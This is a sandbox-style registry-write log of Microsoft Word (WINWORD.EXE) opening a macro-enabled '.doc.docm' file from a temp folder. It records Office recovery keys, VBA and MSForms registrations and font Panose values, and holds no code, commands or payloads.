MTTT
A80D0000541CFFAB56DAD40100000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
6+(
362B2800A80D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
0,(
302C2800A80D00000600000001000000B400000002000000A40000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C006200720069007400740061005F0068006F006C006C00650072006D0061006E006E005F0062006500770065007200620075006E006700730075006E007400650072006C006100670065006E002E0064006F0063002E0064006F0063006D00000000000000
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1315831812
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{2944C4E5-AA44-4FA9-B353-959434475B17}
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\1AE09E
1AE09E
04000000A80D00005100000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C004200720069007400740061005F0048006F006C006C00650072006D0061006E006E005F0042006500770065007200620075006E006700730075006E007400650072006C006100670065006E002E0064006F0063002E0064006F0063006D002F0000004200720069007400740061005F0048006F006C006C00650072006D0061006E006E005F0042006500770065007200620075006E006700730075006E007400650072006C006100670065006E002E0064006F0063002E0064006F0063006D000000000001000000000000000E59DBAB56DAD4019EE01A009EE01A0000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{81B8CC2F-2C9F-49AC-98D0-609CC457553C}\2.0
Microsoft Forms 2.0 Object Library
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{81B8CC2F-2C9F-49AC-98D0-609CC457553C}\2.0\FLAGS
6
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{81B8CC2F-2C9F-49AC-98D0-609CC457553C}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{81B8CC2F-2C9F-49AC-98D0-609CC457553C}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\VBE
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
3496
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Courier New
02070309020205020404
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Symbol
05050102010706020507
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings
05000000000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Mincho
02020609040205080304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Batang
02030600000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun
02010600030101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Gothic
020B0609070205080204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Dotum
020B0600000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimHei
02010609060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU
02020509000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gulim
020B0600000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century
02040604050505020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Angsana New
02020603050405020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cordia New
020B0304020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mangal
02040503050203030202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Latha
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sylfaen
010A0502050306030303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vrinda
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Raavi
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shruti
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gautami
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tunga
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Estrangelo Edessa
03080600000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
02040503050406030204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Unicode MS
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tahoma
020B0604030504040204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Marlett
00000000000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Batang
02030600000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BatangChe
02030609000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@BatangChe
02030609000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gungsuh
02030600000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gungsuh
02030600000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GungsuhChe
02030609000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GungsuhChe
02030609000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DaunPenh
01010101010101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DokChampa
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Euphemia
020B0503040102020104
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vani
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gulim
020B0600000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GulimChe
020B0609000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GulimChe
020B0609000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Dotum
020B0600000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DotumChe
020B0609000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DotumChe
020B0609000101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Impact
020B0806030902050204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Iskoola Pota
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kalinga
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kartika
02020503030404060203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Khmer UI
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lao UI
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Console
020B0609040504020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Malgun Gothic
020B0503020000020004
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Malgun Gothic
020B0503020000020004
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo
020B0604030504040204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo
020B0604030504040204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo UI
020B0604030504040204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo UI
020B0604030504040204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Himalaya
01010100010101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei
020B0604030504040204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft JhengHei
020B0604030504040204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei
020B0503020204020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft YaHei
020B0503020204020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU
02020509000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU-ExtB
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU-ExtB
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU-ExtB
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU-ExtB
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS-ExtB
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS-ExtB
02020500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mongolian Baiti
03000500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Gothic
020B0609070205080204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PGothic
020B0600070205080204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PGothic
020B0600070205080204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS UI Gothic
020B0600070205080204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS UI Gothic
020B0600070205080204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Mincho
02020609040205080304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PMincho
02020600040205080304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PMincho
02020600040205080304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MV Boli
02000500030200090000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft New Tai Lue
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nyala
02000504070300020003
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft PhagsPa
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Plantagenet Cherokee
02020602070100000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Script
020B0504020000000003
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Semibold
020B0702040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Light
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Symbol
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun
02010600030101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
NSimSun
02010609030101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@NSimSun
02010609030101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun-ExtB
02010609060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun-ExtB
02010609060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Tai Le
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shonar Bangla
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Yi Baiti
03000500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Sans Serif
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aparajita
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ebrima
02000000000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gisha
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kokila
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee
020B0502040204020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Uighur
02000000000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MoolBoran
020B0100010101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Utsaah
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vijaya
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Andalus
02020603050405020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arabic Typesetting
03020402040406030203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic
02020603050405020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic Fixed
02070309020205020404
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sakkal Majalla
02000000000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Traditional Arabic
02020603050405020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aharoni
02010803020104030203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
David
020E0502060401010101
3496
WINWORD.EXE
write
